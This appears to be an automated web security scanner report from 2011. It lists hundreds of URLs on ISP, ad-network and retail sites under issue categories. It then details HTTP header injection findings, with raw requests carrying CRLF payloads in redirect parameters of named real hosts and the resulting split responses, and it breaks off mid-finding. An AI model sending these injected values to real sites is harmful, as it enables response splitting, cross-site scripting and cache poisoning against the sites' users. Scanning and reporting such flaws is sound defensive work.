19.14. http://frontier.com/AgentOrdering/customAppTabInfo/tabSetup.js

19.15. http://frontier.com/AgentOrdering/javascripts/AgentOrdering.js

19.16. http://frontier.com/AgentOrdering/javascripts/validateinteger.js

19.17. http://frontier.com/Controls/VirtualCode.ashx

19.18. http://frontier.com/Controls/VirtualCode.ashx

19.19. http://frontier.com/Js/formHelpers.js

19.20. http://frontier.com/Js/jQuery/jquery-1.4.4.min.js

19.21. http://frontier.com/Js/jQuery/jquery.maskedinput.js

19.22. http://frontier.com/Js/s_code.js

19.23. http://frontier.com/Resources/3rdParty/HBX/hbx.js

19.24. http://frontier.com/Resources/3rdParty/JQuery/jq.client.plugin.js

19.25. http://frontier.com/Resources/3rdParty/JQuery/jquery-1.4.2.min.js

19.26. http://frontier.com/Resources/3rdParty/JQuery/jquery-jtemplates.js

19.27. http://frontier.com/Resources/3rdParty/JQuery/jquery-ui.min.js

19.28. http://frontier.com/Resources/3rdParty/JQuery/jquery.json-2.2.js

19.29. http://frontier.com/images/FTRMain/frontier_Logo.jpg

19.30. http://frontier.com/images/FTRMain/gradientBox.png

19.31. http://frontier.com/images/FTRMain/small_arrow.png

19.32. http://frontier.com/images/icon_print.gif

19.33. http://frontier.com/js/jquery/jquery.numeric.js

19.34. http://static.ak.fbcdn.net/connect.php/js/FB.Share

19.35. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.36. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.37. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.38. http://www.facebook.com/extern/login_status.php

19.39. http://www.facebook.com/extern/login_status.php

19.40. http://www.facebook.com/extern/login_status.php

19.41. http://www.facebook.com/extern/login_status.php

19.42. http://www.facebook.com/extern/login_status.php

19.43. http://www.facebook.com/extern/login_status.php

19.44. http://www.facebook.com/extern/login_status.php

19.45. http://www.facebook.com/extern/login_status.php

19.46. http://www.facebook.com/extern/login_status.php

19.47. http://www.facebook.com/extern/login_status.php

19.48. http://www.facebook.com/extern/login_status.php

19.49. http://www.facebook.com/extern/login_status.php

19.50. http://www.facebook.com/extern/login_status.php

19.51. http://www.facebook.com/extern/login_status.php

19.52. http://www.facebook.com/plugins/activity.php

19.53. http://www.facebook.com/plugins/like.php

19.54. http://www.facebook.com/plugins/like.php

19.55. http://www.facebook.com/plugins/like.php

19.56. http://www.facebook.com/plugins/like.php

19.57. http://www.facebook.com/plugins/like.php

19.58. http://www.facebook.com/plugins/like.php

19.59. http://www.facebook.com/plugins/like.php

19.60. http://www.facebook.com/plugins/like.php

19.61. http://www.facebook.com/plugins/like.php

19.62. http://www.facebook.com/plugins/like.php

19.63. http://www.facebook.com/plugins/like.php

19.64. http://www.facebook.com/plugins/like.php

19.65. http://www.facebook.com/plugins/like.php

19.66. http://www.facebook.com/plugins/like.php

19.67. http://www.facebook.com/plugins/like.php

19.68. http://www.facebook.com/plugins/likebox.php

19.69. http://www.facebook.com/plugins/likebox.php

19.70. http://www.facebook.com/plugins/likebox.php

19.71. http://www.fairpoint.com/scripts/script.js

19.72. http://www.frontier.com/Js/s_code.js

19.73. http://www.frontierhelp.com/

19.74. http://www.frontierpages.com/scripts/s_code.js

19.75. http://www.vonage.com/

19.76. http://www.vonage.com/

19.77. http://www.vonage.com/googlesearch/cluster.js

19.78. http://www.vonage.com/search.php

19.79. http://www.whitefence.com/static/Seymour.js

20. Social security numbers disclosed

21. Credit card numbers disclosed

21.1. http://ad.doubleclick.net/adj/myfitv.com/z300x250

21.2. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js

21.3. http://search.yahoo.com/search

22. Robots.txt file

22.1. http://533-rgz-601.mktoresp.com/webevents/visitWebPage

22.2. http://a.adready.com/campaign_event/impression

22.3. http://a.analytics.yahoo.com/fpc.pl

22.4. http://ad.turn.com/server/ads.htm

22.5. http://ad.yieldmanager.com/pixel

22.6. http://ads.bluelithium.com/iframe3

22.7. http://ads.pointroll.com/PortalServe/

22.8. http://adserver.teracent.net/tase/ad

22.9. http://altfarm.mediaplex.com/ad/js/3484-103250-2056-0

22.10. http://api.facebook.com/restserver.php

22.11. http://api.recaptcha.net/challenge

22.12. http://as.casalemedia.com/j

22.13. http://as1.suitesmart.com/99917/G15493.js

22.14. http://autos.yahoo.com/

22.15. http://b.scorecardresearch.com/b

22.16. http://by.optimost.com/trial/471/p/customerhomepage.58a/57/content.js

22.17. http://cdn.optmd.com/V2/80181/197812/index.html

22.18. http://cdn.turn.com/server/ddc.htm

22.19. http://citizenstelecom.112.2o7.net/b/ss/cznfrontier/1/H.22.1/s93230034164153

22.20. http://comcast-www.baynote.net/baynote/tags3/common

22.21. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard

22.22. http://ec.atdmt.com/ds/TRATR11234001/300x100/multipolicy_300x100.swf

22.23. http://ehg-verizon.hitbox.com/HG

22.24. http://espanol.vonage.com/mpel.js

22.25. http://event.rtrk.com/event/

22.26. http://finance.yahoo.com/

22.27. http://fonts.googleapis.com/css

22.28. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431

22.29. http://frontier.com/winwin1

22.30. http://g-pixel.invitemedia.com/gmatcher

22.31. http://games.frontier.com/

22.32. http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp

22.33. https://go.ooma.com/activate

22.34. http://gws.maps.yahoo.com/MapImage

22.35. http://iar.worthathousandwords.com/iar.gif

22.36. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js

22.37. http://int.teracent.net/tase/int

22.38. http://integrate.112.2o7.net/dfa_echo

22.39. http://ips-invite.iperceptions.com/webValidator.aspx

22.40. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/

22.41. https://login.aptela.com/cgi/login.cgi

22.42. https://login.comcast.net/login

22.43. http://metrics.scottrade.com/b/ss/scottradecom,scottradeglobal/1/H.22.1/s98473441649693

22.44. http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s95377543827053

22.45. http://movies.yahoo.com/

22.46. http://music.yahoo.com/

22.47. http://new.music.yahoo.com/

22.48. http://o.analytics.yahoo.com/fpc.pl

22.49. http://pagead2.googlesyndication.com/pagead/imgad

22.50. http://pixel.everesttech.net/2565/i

22.51. http://pixel.fetchback.com/serve/fb/pdc

22.52. http://pixel.invitemedia.com/data_sync

22.53. http://pixel.quantserve.com/api/segments.json

22.54. http://postcalc.usps.gov/WebResource.axd

22.55. http://r.casalemedia.com/r

22.56. http://realestate.yahoo.com/

22.57. http://s0.2mdn.net/1033846/mmna_i_likeable_300x250.swf

22.58. http://search.keywordblocks.com/

22.59. http://search.yahoo.com/search

22.60. http://segment-pixel.invitemedia.com/pixel

22.61. http://sensor2.suitesmart.com/sensor4.js

22.62. http://serviceo.comcast.net/b/ss/comcastdotcomprod/1/H.22.1/s91887737833894

22.63. http://servicetips.whitefence.com/

22.64. http://shopping.yahoo.com/

22.65. http://show.partners-z.com/s/show

22.66. http://sitesearch.comcast.com/static.php

22.67. http://spe.atdmt.com/ds/UXULASONYSPE/Bucky_Larson_Born_to_be_a_Star/300x250_BTBS_Dante_Yh1k.swf

22.68. http://speed.pointroll.com/PointRoll/Media/Banners/Apple/891280/dg2_300x250.jpg

22.69. http://static.ak.fbcdn.net/connect/xd_proxy.php

22.70. http://support.aptela.com:9000/tools/ResetPassword.cgi

22.71. http://t.invitemedia.com/track_imp

22.72. http://t.pointroll.com/PointRoll/Track/

22.73. http://tags.mathtag.com/view/js/

22.74. http://themes.googleusercontent.com/static/fonts/ubuntu/v1/_xyN3apAT_yRRDeqB3sPRg.woff

22.75. http://udmserve.net/udm/img.fetch

22.76. http://us.bc.yahoo.com/b

22.77. http://utdi.reachlocal.com/

22.78. http://utdi.reachlocal.net/index.html

22.79. http://video.music.yahoo.com/crossdomain.xml

22.80. http://whitefence.112.2o7.net/b/ss/pcwhitefencecom/1/H.21/s91730218948796

22.81. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

22.82. http://www.aptela.com/lp2011/T2V1

22.83. http://www.burstnet.com/enlightn/8117/3E06/

22.84. http://www.comcast.com/shop/buyflow/default.ashx

22.85. https://www.comcast.com/Localization/Localize.cspx

22.86. http://www.facebook.com/plugins/like.php

22.87. http://www.frontier.com/yahoo/fy_excl2.aspx

22.88. https://www.frontier.com/AgentOrdering/Login/

22.89. http://www.google-analytics.com/siteopt.js

22.90. http://www.googleadservices.com/pagead/aclk

22.91. http://www.myfitv.com/portal/recent_tv_elastic

22.92. http://www.ooma.com/

22.93. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

22.94. http://www.pgatour.com/.element/ssi/ads/2.0/gdyn_pgatour.html

22.95. https://www.usps.com/tools/domesticratecalc/welcome.htm

22.96. http://www.vonage.com/

22.97. http://www.whitefence.com/category/home-phone/

22.98. http://www.zillow.com/app

22.99. http://www2.whitefence.com/a

22.100. http://xfinity.comcast.net/js-api/compressed/xpbar.js

23. Cacheable HTTPS response

23.1. https://login.comcast.net/myaccount/images/overlay-bg.png

23.2. https://login.comcast.net/myaccount/images/sprites/base.png

23.3. https://login.comcast.net/myaccount/images/sprites/gradient.png

23.4. https://login.comcast.net/myaccount/images/sprites/xfinity_sprite.png

23.5. https://login.comcast.net/myaccount/js/additional-methods.min.js

23.6. https://login.comcast.net/myaccount/js/jquery-1.5.2.min.js

23.7. https://login.comcast.net/myaccount/js/jquery.validate.min.js

23.8. https://login.comcast.net/myaccount/js/omniture.js

23.9. https://login.comcast.net/myaccount/js/scripts.min.js

23.10. https://login.frontier.com/webmail/

23.11. https://us.etrade.com/e/t/jumppage/viewjumppage

23.12. https://www.comcast.com/Localization/QueryCompletion.cajax

23.13. https://www.comcastsupport.com/ChatEntry/

23.14. https://www.comcastsupport.com/ChatEntry/Content/Images/favicon.ico

23.15. https://www.comcastsupport.com/ChatEntry/Content/Images/mainbg.jpg

23.16. https://www.comcastsupport.com/ChatEntry/Content/Images/start_chat.png

23.17. https://www.comcastsupport.com/ChatEntry/Content/images/menubg.jpg

23.18. https://www.comcastsupport.com/ChatEntry/Forms/Suggestions.aspx

23.19. https://www.comcastsupport.com/ChatEntry/Forms/UserForm.aspx

23.20. https://www.comcastsupport.com/ChatEntry/eHelpProxy.asmx

23.21. https://www.comcastsupport.com/ChatEntry/img/xfinity/gradient.png

23.22. https://www.comcastsupport.com/chatentry/Default.aspx

23.23. https://www.fidelity.com/welcome/200-free-trades

23.24. https://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css

23.25. https://www.frontier.com/AgentOrdering/Login/

23.26. https://www.frontier.com/AgentOrdering/Login/Default.aspx

23.27. https://www.frontier.com/BillPay/Login.aspx

23.28. https://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale

23.29. https://www.frontier.com/Shop/Login.aspx

23.30. https://www.frontiermobile.com/data/

23.31. https://www.frontiermobile.com/favicon.ico

23.32. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

24. HTML does not specify charset

24.1. http://ad.doubleclick.net/adi/N2434.Yahoo/B5625836.2

24.2. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.11

24.3. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.12

24.4. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396

24.5. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400

24.6. http://ad.doubleclick.net/adi/N3340.dedicatedmedia.com/B5641952.2

24.7. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.101

24.8. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.102

24.9. http://ad.doubleclick.net/adi/ober.frontier/$%7BSEG_IDS%7D

24.10. http://ad.doubleclick.net/adi/ober.frontier/product_119282623

24.11. http://ad.doubleclick.net/adi/ober.frontier/product_undefined

24.12. http://ad.yieldmanager.com/iframe3

24.13. http://ads.pointroll.com/PortalServe/

24.14. http://comcast-www.baynote.net/favicon.ico

24.15. http://games.frontier.com/graphics/frontier/1000/site/favicon.ico

24.16. https://login.frontier.com/webmail/

24.17. https://login.frontiermobile.com/

24.18. http://p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html

24.19. http://p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html

24.20. http://pixel.invitemedia.com/data_sync

24.21. http://sensor2.suitesmart.com/sensor4.js

24.22. http://uac.advertising.com/wrapper/aceUACping.htm

24.23. https://us.etrade.com/e/t/jumppage/viewjumppage

24.24. http://view.atdmt.com/MDS/iview/346808775/direct/01

24.25. http://view.atdmt.com/TR1/iview/332867993/direct/01

24.26. http://view.atdmt.com/ULA/iview/351127232/direct/01

24.27. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1

24.28. http://www.comcast.com/2go/

24.29. http://www.pgatour.com/.element/ssi/ads/2.0/gdyn_pgatour.html

24.30. https://www.usps.com/tools/domesticratecalc/welcome.htm

24.31. http://www.vonage.com/googlesearch/get_results.php

24.32. http://www.websitealive9.com/2140/Visitor/vTracker_v2.asp

25. Content type incorrectly stated

25.1. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**

25.2. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**

25.3. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**

25.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**

25.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**

25.6. http://ads.yimg.com/a/a/ma/matt/yahoo_realestate_home180x40.jpeg

25.7. http://amch.questionmarket.com/adsc/d847178/33/873120/randm.js

25.8. http://beacon.dedicatednetworks.com/js/t.aspx

25.9. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1

25.10. http://cimage.adobe.com/omninav/thin_omninav2.0.4.js

25.11. http://comcast-www.baynote.net/baynote/tags3/common

25.12. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard

25.13. http://customer.comcast.com/App_Themes/Default/img/SubChannelSelected.gif

25.14. http://event.adxpose.com/event.flow

25.15. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css

25.16. http://frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale

25.17. http://frontier.my.yahoo.com/e/js

25.18. http://games.frontier.com/WebAnalysis/APP/GenerateCode.ashx

25.19. http://games.frontier.com/graphics/frontier/1000/site/favicon.ico

25.20. http://ips-invite.iperceptions.com/webValidator.aspx

25.21. https://login.comcast.net/myaccount/images/overlay-bg.png

25.22. https://login.comcast.net/myaccount/images/sprites/base.png

25.23. https://login.comcast.net/myaccount/images/sprites/gradient.png

25.24. https://login.comcast.net/myaccount/images/sprites/xfinity_sprite.png

25.25. https://login.comcast.net/myaccount/js/additional-methods.min.js

25.26. https://login.comcast.net/myaccount/js/jquery-1.5.2.min.js

25.27. https://login.comcast.net/myaccount/js/jquery.validate.min.js

25.28. https://login.comcast.net/myaccount/js/omniture.js

25.29. https://login.comcast.net/myaccount/js/scripts.min.js

25.30. http://maps.yahoo.com/services/bizloc/america/bizloc

25.31. http://new.music.yahoo.com/chartsHpJS.js

25.32. http://new.music.yahoo.com/rhap_status.html

25.33. http://new.music.yahoo.com/ymusicStayConnected/

25.34. http://pixel.fetchback.com/serve/fb/pdc

25.35. http://realestate.yahoo.com/autocomplete/cities.html

25.36. http://realestate.yahoo.com/robots.txt

25.37. http://sales.liveperson.net/hcp/html/mTag.js

25.38. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**

25.39. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**

25.40. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/59689.70851972699

25.41. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/78868.26389003545

25.42. http://sensor2.suitesmart.com/sensor4.js

25.43. http://sitesearch.comcast.com/

25.44. http://sitesearch.comcast.com/favicon.ico

25.45. http://verify.authorize.net/anetseal/images/secure90x72.gif

25.46. http://www.aptela.com/favicon.ico

25.47. http://www.comcast.com/MediaLibrary/1/1/Common/Images/borders/230_Middle.gif

25.48. http://www.comcast.com/MediaLibrary/1/1/Common/Images/borders/230_bottom.gif

25.49. http://www.comcast.com/MediaLibrary/1/1/Common/Images/borders/230_top.gif

25.50. https://www.comcast.com/Localization/QueryCompletion.cajax

25.51. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css

25.52. http://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale

25.53. https://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css

25.54. https://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale

25.55. http://www.ooma.com/poormanscron/run-cron-check

25.56. http://www.ooma.com/sites/all/themes/ooma/img/home_savings_bar.png

25.57. http://www.vonage.com/googlesearch/get_results.php

25.58. http://www.websitealive9.com/2140/Visitor/vTracker_v2.asp

25.59. http://www.whitefence.com/favicon.ico

26. Content type is not specified

26.1. http://ad.yieldmanager.com/st

26.2. http://ads.pointroll.com/PortalServe/

1. HTTP header injection
There are 47 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://40.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://40.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 90175%0d%0a2b5c414d0be was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=85&camp=2140&affcode=kw94444&cid=13569521491&networkType=search&url[]=http%3A%2F%2Fwww.whitefence.com%2Fcategory%2Fhome-phone%2F&90175%0d%0a2b5c414d0be=1 HTTP/1.1
Host: 40.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:51:59 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d56463713%00%0D%0A1812607ce81; expires=Mon, 05-Dec-2011 11:51:59 GMT; path=/; domain=.xg4ken.com
Location: http://www.whitefence.com/category/home-phone/?90175
2b5c414d0be
=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.2. http://40.xg4ken.com/media/redir.php [url[] parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://40.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the url[] request parameter is copied into the Location response header. The payload fda0b%0d%0ab73d971c7c4 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=85&camp=2140&affcode=kw94444&cid=13569521491&networkType=search&url[]=http%3A%2F%2Fwww.whitefence.com%2Fcategory%2Fhome-phone%2Ffda0b%0d%0ab73d971c7c4 HTTP/1.1
Host: 40.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:51:57 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564e4a5efed390e8f23a4fed9e9; expires=Mon, 05-Dec-2011 11:51:57 GMT; path=/; domain=.xg4ken.com
Location: http://www.whitefence.com/category/home-phone/fda0b
b73d971c7c4

P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.3. http://pixel.everesttech.net/2565/c [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /2565/c

Issue detail

The value of the url request parameter is copied into the Location response header. The payload 6b47c%0d%0a72c5727bcc8 was submitted in the url parameter. This caused a response containing an injected HTTP header.

Request

GET /2565/c?ev_ct=d&ev_sid=54&ev_ci=1660002714&ev_ai=1660082513&ev_cri=1660643811&url=http%3A//landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/%3Futm_source%3Dyhofin%26utm_medium%3Dpaid-banner-ads%26utm_campaign%3D120x60-QuotesBttn%26utm_content%3Dstock%3AoldGrnBlk6b47c%0d%0a72c5727bcc8 HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gglck=zqROZUBXyFQAAIdR; everest_session_v2=AXNOZhaIGXMAAIM3; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:48:34 GMT
Server: Apache
Set-Cookie: everest_session_v2=AXNOZhaIGXMAAIM3160904156a23c7e8c69dff72; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR16090415e6ca9e4734959b1; path=/; domain=.everesttech.net; expires=Tue, 10-Sep-2030 23:28:34 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Location: http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk6b47c
72c5727bcc8

Content-Length: 382
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://landing.optionshouse.com/rate/395/yhofin
...[SNIP]...

1.4. http://redirect.rtrk.com/redirect [RL_ckstr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redirect.rtrk.com
Path:   /redirect

Issue detail

The value of the RL_ckstr request parameter is copied into the Set-Cookie response header. The payload 116f0%0d%0afc7a19355f0 was submitted in the RL_ckstr parameter. This caused a response containing an injected HTTP header.

Request

GET /redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26rl_key%3De2e30c5686d91c3f4971163361e1b86a%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520111271%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0116f0%0d%0afc7a19355f0 HTTP/1.1
Host: redirect.rtrk.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:48 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0116f0
fc7a19355f0
; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Location: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
Vary: Accept-Encoding
Content-Length: 587
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:41 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.reachlocal.com/coupon/?scid=2323693
...[SNIP]...

1.5. http://redirect.rtrk.com/redirect [RL_qstr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redirect.rtrk.com
Path:   /redirect

Issue detail

The value of the RL_qstr request parameter is copied into the Location response header. The payload d0f4f%0d%0a6e008c98e33 was submitted in the RL_qstr parameter. This caused a response containing an injected HTTP header.

Request

